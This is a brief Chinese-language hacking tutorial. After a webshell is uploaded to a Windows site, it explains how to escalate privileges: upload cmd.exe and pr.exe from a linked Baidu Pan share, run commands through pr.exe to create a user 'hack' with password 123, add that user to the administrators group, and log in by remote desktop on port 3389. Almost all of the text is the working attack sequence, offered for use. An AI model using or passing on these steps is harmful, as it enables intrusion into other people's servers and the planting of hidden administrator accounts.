很多时候,当我们上传了一句话木马之后,想要进行一些操作。比如,查看当前用户的身份,这时会发现权限不够,当前的命令行只对网站当前目录下的文件具有操作权限,对其他目录和系统都没有权限,这时我们就需要提权了。
我们把下面两个程序上传到网站目录下去
程序链接:链接: https://pan.baidu.com/s/1ibgYfY38kBLsbq72NsVEHg 提取码: unyc
然后执行下面这条命令,把当前终端的执行程序设置成我们上传的 cmd.exe
setp "C:\website\站酷爱装网V2012版\UploadFiles\cmd.exe"
然后我们就可以做我们想做的任何事情了。我们的命令用双引号引住,前面加上 pr.exe
pr.exe "net user hack 123 /add" #新建一个hack用户,密码为 123
pr.exe "net localgroup administrators hack /add" #将hack用户加入administrators管理员组
接着,我们就可以用远程桌面登录了,前提是目标主机开启了3389远程端口